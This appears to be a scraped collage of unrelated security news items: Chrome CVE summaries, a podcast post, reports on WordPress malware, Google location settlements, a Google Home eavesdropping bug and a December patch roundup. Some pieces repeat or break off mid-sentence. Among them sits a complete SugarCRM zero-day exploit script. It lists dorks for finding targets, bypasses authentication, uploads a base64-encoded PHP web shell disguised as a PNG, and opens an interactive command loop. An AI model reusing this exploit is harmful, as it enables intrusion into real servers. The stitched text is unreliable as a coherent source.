Out of bounds read in WebUI Settings in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chrome security severity: Low)

**Chrome Releases**

Release updates from the Chrome team

CVE-2021-21200: Stable Channel Update for Desktop

Use after free in FileAPI in Google Chrome prior to 72.0.3626.81 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chrome security severity: High)

CVE-2019-13768

Inappropriate implementation in Paint in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to leak cross-origin data outside an iframe via a crafted HTML page. (Chrome security severity: Low)

CVE-2022-4025

Integer overflow in Window Manager in Google Chrome on Chrome OS and Lacros prior to 104.0.5112.79 allowed a remote attacker who convinced a user to engage in specific UI interactions to perform an out of bounds memory write via crafted UI interactions. (Chrome security severity: High)

CVE-2022-2743

Categories: Podcast
This week on Lock and Code, we talk about we technology no longer excites the public, and whether that's because of worse products, or worse promises. 



(Read more...)




The post Why does technology no longer excite us? Lock and Code S04E01 appeared first on Malwarebytes Labs.

When did technology last excite you? 

If Douglas Adams, author of The Hitchhiker's Guide to the Galaxy, is to be believed, your own excitement ended, simply had to end, after turning 35 years old. Decades ago, at first writing privately and later having those private writings published after his death, Adams had come up with "a set of rules that describe our reactions to technologies." They were simple and short: 

1.  Anything that is in the world when you’re born is normal and ordinary and is just a natural part of the way the world works.
2.  Anything that's invented between when you’re fifteen and thirty-five is new and exciting and revolutionary and you can probably get a career in it.
3.  Anything invented after you're thirty-five is against the natural order of things.

Today, on the Lock and Code podcast with host David Ruiz, we explore why technology seemingly no longer excites us. It could be because every annual product release is now just an iterative improvement from the exact same product release the year prior. It could be because just a handful of companies now control innovation. It could even be because technology is now fatally entangled with the business of _money-making_, and so, with every one money-making idea, dozens of other companies flock to the same idea, giving us the same product, but with a different veneer—Snapchat recreated endlessly across the social media landscape, cable television subscriptions "disrupted" by so many streaming services that we recreate the same problem we had before. 

Or, it could be because, as was first brought up by Shannon Vallor, director of the Centre for Technomoral Futures in the Edinburgh Futures Institute, that the _promise_ of technology is not what it once was, or at least, not what we once _thought_ it was. As Vallor wrote on Twitter in August of this year: 

> "There’s no longer anything being promised to us by tech companies that we actually need or asked for. Just more monitoring, more nudging, more draining of our data, our time, our joy."

For our first episode of Lock and Code in 2023—and our first episode of our _fourth season_ (how time flies)—we bring back Malwarebytes Labs editor-in-chief Anna Brading and Malwarebytes Labs writer Mark Stockley to ask: Why does technology no longer excite them? 

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Why does technology no longer excite us? Lock and Code S04E01

WordPress sites are being targeted by a previously unknown strain of Linux malware that exploits flaws in over two dozen plugins and themes to compromise vulnerable systems.
"If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted web pages are injected with malicious JavaScripts," Russian security vendor Doctor Web said in a report published last week. "As a result,

WordPress sites are being targeted by a previously unknown strain of Linux malware that exploits flaws in over two dozen plugins and themes to compromise vulnerable systems.

"If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted web pages are injected with malicious JavaScripts," Russian security vendor Doctor Web said in a report published last week. "As a result, when users click on any area of an attacked page, they are redirected to other sites."

The attacks involve weaponizing a list of known security vulnerabilities in 19 different plugins and themes that are likely installed on a WordPress site, using it to deploy an implant that can target a specific website to further expand the network.

It's also capable of injecting JavaScript code retrieved from a remote server in order to redirect the site visitors to an arbitrary website of the attacker's choice.

Doctor Web said it identified a second version of the backdoor, which uses a new command-and-control (C2) domain as well as an updated list of flaws spanning 11 additional plugins, taking the total to 30.

The targeted plugins and themes are below -

*   WP Live Chat Support
*   Yuzo Related Posts
*   Yellow Pencil Visual CSS Style Editor
*   Easy WP SMTP
*   WP GDPR Compliance
*   Newspaper (CVE-2016-10972)
*   Thim Core
*   Smart Google Code Inserter (discontinued as of January 28, 2022)
*   Total Donations
*   Post Custom Templates Lite
*   WP Quick Booking Manager
*   Live Chat with Messenger Customer Chat by Zotabox
*   Blog Designer
*   WordPress Ultimate FAQ (CVE-2019-17232 and CVE-2019-17233)
*   WP-Matomo Integration (WP-Piwik)
*   ND Shortcodes
*   WP Live Chat
*   Coming Soon Page and Maintenance Mode
*   Hybrid
*   Brizy
*   FV Flowplayer Video Player
*   WooCommerce
*   Coming Soon Page & Maintenance Mode
*   Onetone
*   Simple Fields
*   Delucks SEO
*   Poll, Survey, Form & Quiz Maker by OpinionStage
*   Social Metrics Tracker
*   WPeMatico RSS Feed Fetcher, and
*   Rich Reviews

Both variants are said to include an unimplemented method for brute-forcing WordPress administrator accounts, although it's not clear if it's a remnant from an earlier version or a functionality that's yet to see the light.

"If such an option is implemented in newer versions of the backdoor, cybercriminals will even be able to successfully attack some of those websites that use current plugin versions with patched vulnerabilities," the company said.

WordPress users are recommended to keep all the components of the platform up-to-date, including third-party add-ons and themes. It's also advised to use strong and unique logins and passwords to secure their accounts.

The disclosure comes weeks after Fortinet FortiGuard Labs detailed another botnet called GoTrim that's designed to brute-force self-hosted websites using the WordPress content management system (CMS) to seize control of targeted systems.

Last month, Sucuri noted that more than 15,000 WordPress sites had been breached as part of a malicious campaign to redirect visitors to bogus Q&A portals. The number of active infections currently stands at 9,314.

The GoDaddy-owned website security company, in June 2022, also shared information about a traffic direction system (TDS) known as Parrot that has been observed targeting WordPress sites with rogue JavaScript that drops additional malware onto hacked systems.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

WordPress Security Alert: New Linux Malware Exploiting Over Two Dozen CMS Flaws

Google has agreed to pay a total of $29.5 million to settle two different lawsuits brought by Indiana and Washington, D.C., over its "deceptive" location tracking practices.
The search and advertising giant is required to pay $9.5 million to D.C. and $20 million to Indiana after the states sued the company for charges that the company tracked users' locations without their express consent.
The

Privacy / Location Tracking

Google has agreed to pay a total of $29.5 million to settle two different lawsuits brought by Indiana and Washington, D.C., over its "deceptive" location tracking practices.

The search and advertising giant is required to pay $9.5 million to D.C. and $20 million to Indiana after the states sued the company for charges that the company tracked users' locations without their express consent.

The settlement adds to the $391.5 million Google agreed to pay to 40 states over similar allegations last month. The company is still facing two more location-tracking lawsuits in Texas and Washington.

The lawsuits came in response to revelations in 2018 that the internet company continued to track users' whereabouts on Android and iOS through a setting called Web & App Activity despite turning Location History options off.

Google was also accused of employing dark patterns, which refer to design choices intended to deceive users into carrying out actions that violate their privacy and overshare information without their knowledge or affirmation.

"Google uses location data collected from Indiana consumers to build detailed user profiles and target ads, but Google has deceived and misled users about its practices since at least 2014," the state said in a statement last week.

Pursuant to the settlement, the company has been ordered to notify users with Location History and Web & App Activity enabled about whether location data is being collected, alongside steps users can take to disable the settings and delete the data.

Google is also expected to maintain a web page that discloses all the types and sources of location data it gathers as well as refrain from sharing users' precise location information with third-party advertisers without explicit consent.

What's more, it will need to automatically delete location data derived from a "device or from IP addresses in Web & App Activity within 30 days" of obtaining the information.

The Mountain View-based company, in November 2022, noted that the lawsuits are based on "outdated product policies" and that it has rolled out a number of privacy and transparency enhancements that allow users to auto-delete location data tied to their accounts.

Google further stated it will start providing more "detailed" information regarding the Web & App Activity control, in addition to launching an information hub and a new toggle to turn off both Location History and Web & App Activity settings and delete past data in "one simple flow."

"Given the vast level of tracking and surveillance that technology companies can embed into their widely used products, it is only fair that consumers be informed of how important user data, including information about their every move, is gathered, tracked, and utilized by these companies," D.C. Attorney General Karl A. Racine said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google to Pay $29.5 Million to Settle Lawsuits Over User Location Tracking

By Deeba Ahmed
The issue was caused by the software architecture used in Google Home devices.
This is a post from HackRead.com Read the original post: Google Home Vulnerability: Eavesdropping on Conversations

Matt Kunze, an ethical hacker, reported wiretapping bugs in Google Home Smart Speakers, for which he received a bug bounty worth $107,500.

Google Assistant is currently more popular among smart homeowners than Amazon Alexa and Apple Siri, given its superior intuitiveness and capability to conduct lengthy conversations. However, according to the latest research, a vulnerability in **Google Home Smart speakers** could allow attackers to control the smart device and eavesdrop on user conversations indoors.

**Findings Details**

The vulnerability was identified by Matt Kunze, a security researcher using the moniker DownrightNifty Matt. The researchers revealed that if exploited, the vulnerability could allow the installation of backdoors and convert Google Home Smart speakers into wiretapping devices. Moreover, Google fixed the issue in April 2021 following responsible disclosure on 8 January 2021 and developing a Proof-of-Concept for the company.

**Possible Dangers**

The vulnerability could let an adversary present within the device’s wireless proximity install a backdoor account on the device and start sending remote commands, access the microphone feed, and initiate arbitrary HTTP requests. All of this could be possible if the attacker is within the user’s LAN range because making malicious requests **exposes the Wi-Fi password** of the device and provides the attacker direct access to all devices connected to the network.

**What Caused the Issue?**

Matt discovered that the problem was caused by the software architecture used in Google Home devices as it let an adversary add a rogue Google user account to their target’s smart home devices.

A threat actor would trick the individual into installing a malicious Android application to make the attack work. It will detect a Google Home automation device connected to the network and stealthily start issuing HTTP requests to link the threat actor’s account to the victim’s device.

In addition, the attacker could stage a Wi-Fi de-authentication attack to disconnect the Google Home device from the network and force the appliance to initiate a setup mode and create an open Wi-Fi network. Subsequently, the attacker can connect to this network and request additional details such as device name, certificate, and cloud\_device\_id. They could use the information and connect their account to the victim’s device.

According to Matt’s **blog post**, the attacker could perform a range of functions, such as turning the speaker’s volume down to zero and making calls to any phone number apart from spying on the victim via the microphone. The victim won’t suspect anything because just the device’s LED turns blue when the exploitation happens, and the user would think the firmware is being updated.

Matt successfully connected an unknown user account to a Google Home speaker. He created a **backdoor account** on the targeted device and obtained unprecedented privileges that let him send remote commands to the Home mini smart speaker, access its microphone feed, etc. Watch the demo shared by the researcher:

It is worth noting that there’s no evidence this security loophole was misused since its detection in 2021. Being an ethical hacker, the researcher notified Google about the issue, and it was patched. Matt received a **bug bounty** worth $107,500 for detecting this security flaw.

1.  **Google Home Mini Secretly Recorded Conversations**
2.  **Voice assistant devices manipulated with ultrasonic waves**
3.  **Comcast voice remote control could be turned into a spying tool**
4.  **Using laser on Alexa and Google home to unlock your front door**
5.  **DolphinAttack: Voice Assistant Apps Siri and Alexa Can Be Hacked**

Google Home Vulnerability: Eavesdropping on Conversations

SugarCRM versions up to 12.2.0 suffer from a remote shell upload vulnerability.

    #!/usr/bin/env python## SugarCRM 0-day Auth Bypass + RCE Exploit## Dorks:# https://www.google.com/search?q=site:sugarondemand.com&filter=0# https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php# https://www.shodan.io/search?query=http.title:"SugarCRM"# https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM"# https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com"import base64, re, requests, sys, uuidrequests.packages.urllib3.disable_warnings()if len(sys.argv) != 2:  sys.exit("Usage: %s [URL]" % sys.argv[0])  print "[+] Sending authentication request"url     = sys.argv[1] + "/index.php"session = {"PHPSESSID": str(uuid.uuid4())}params  = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1}requests.post(url, cookies=session, data=params, verify=False)print "[+] Uploading PHP shell\n"png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC"upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like .php7 .php5 or .phtmlparams = {"module": "EmailTemplates", "action": "AttachFiles"}requests.post(url, cookies=session, data=params, files=upload, verify=False)url = sys.argv[1] + "/cache/images/sweet.phar"while True:  cmd = raw_input("# ")  res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False)  res = re.search("#####(.*)#####", res.text, re.DOTALL)  if res:    print res.group(1)  else:    sys.exit("\n[+] Failure!\n")

SugarCRM Shell Upload

Plus: Patches for Apple iOS 16, Google Chrome, Windows 10, and more.

The holiday season is almost over, but security patches are still continuing to arrive thick and fast in December. The month has seen updates released by Apple, Google, and Microsoft, as well as enterprise software companies including the likes of SAP, Citrix, and VMWare. 

Many of the patches fix zero-day vulnerabilities already being exploited in attacks, making it important that they are applied as soon as possible. Here’s the lowdown on all the patches released in December.

Apple iOS and iPadOS 16.2, iOS 15.7.2, iOS 16.1.2

Apple released a major point upgrade to its iOS 16 operating system in December: iOS 16.2. The update comes with features including end-to-end encryption in iCloud, but it also fixes 35 security vulnerabilities.

None of the issues patched in iOS 16.2 are known to have been used in attacks; however, many are pretty serious. The flaws include six in the Kernel and nine in the engine that powers Apple’s Safari browser, WebKit, which could allow an attacker to execute code. 

Apple also released iOS 15.7.2 for users of older iPhones that can’t run iOS 16, fixing a flaw already being used in attacks. Tracked as CVE-2022-42856, the WebKit vulnerability could allow an attacker to execute code, according to Apple’s support page. At the end of November, Apple fixed the same WebKit flaw in iOS 16.1.2.

Since the launch of iOS 16 in September, Apple has been offering security updates to those who don’t want to upgrade to the new operating system. But iOS 15.7.2 is only for older iPhones, so if you’ve got an iPhone 8 or above, you now need to upgrade to iOS 16 to stay secure. 

The iPhone maker also released macOS Ventura 13.1, watchOS 9.2, tvOS 16.2, macOS Big Sur 11.7.2, macOS Monterey 12.6.2, and Safari 16.2.

Google Android 

December was a hefty patch month for Google’s Android operating system, with fixes for dozens of security vulnerabilities issued during the month. Tracked as CVE-2022-20411, the most severe is a critical vulnerability in the System component that could lead to remote code execution over Bluetooth with no additional execution privileges needed, Google said in a security bulletin. 

Google also fixed two critical flaws in the Android Framework component, CVE-2022-20472 and CVE-2022-20473. Meanwhile, 151 Pixel-specific bugs were patched by Google in December. 

The December patch is available for Google’s own Pixel devices as well as Samsung smartphones, including the hardware maker’s flagship Galaxy range. 

Google Chrome 108

Google has issued an emergency update for its Chrome browser to fix the ninth zero-day vulnerability of the year. Tracked as CVE-2022-4262, the high-severity type confusion issue in Chrome’s V8 JavaScript engine could allow a remote attacker to exploit heap corruption via a crafted HTML page. “Google is aware that an exploit for CVE-2022-4262 exists in the wild,” the browser maker said in a blog.

The emergency update arrived just days after Google released Chrome 108, patching 28 security flaws. Among the fixes are CVE-2022-4174—a type confusion flaw in V8—and several use-after-free bugs. None of these vulnerabilities have been exploited in attacks, according to Google. But given that the latest bug is already in the hands of attackers, it’s a good idea to update Chrome as soon as possible.

Microsoft Patch Tuesday 

Microsoft’s December Patch Tuesday was another big one, fixing 49 security vulnerabilities, including a flaw being used in attacks. Tracked as CVE-2022-44698, the issue is a Windows SmartScreen security feature bypass vulnerability that could lead to loss of integrity and availability.

“An attacker can craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging,” Microsoft said.

Tag

#google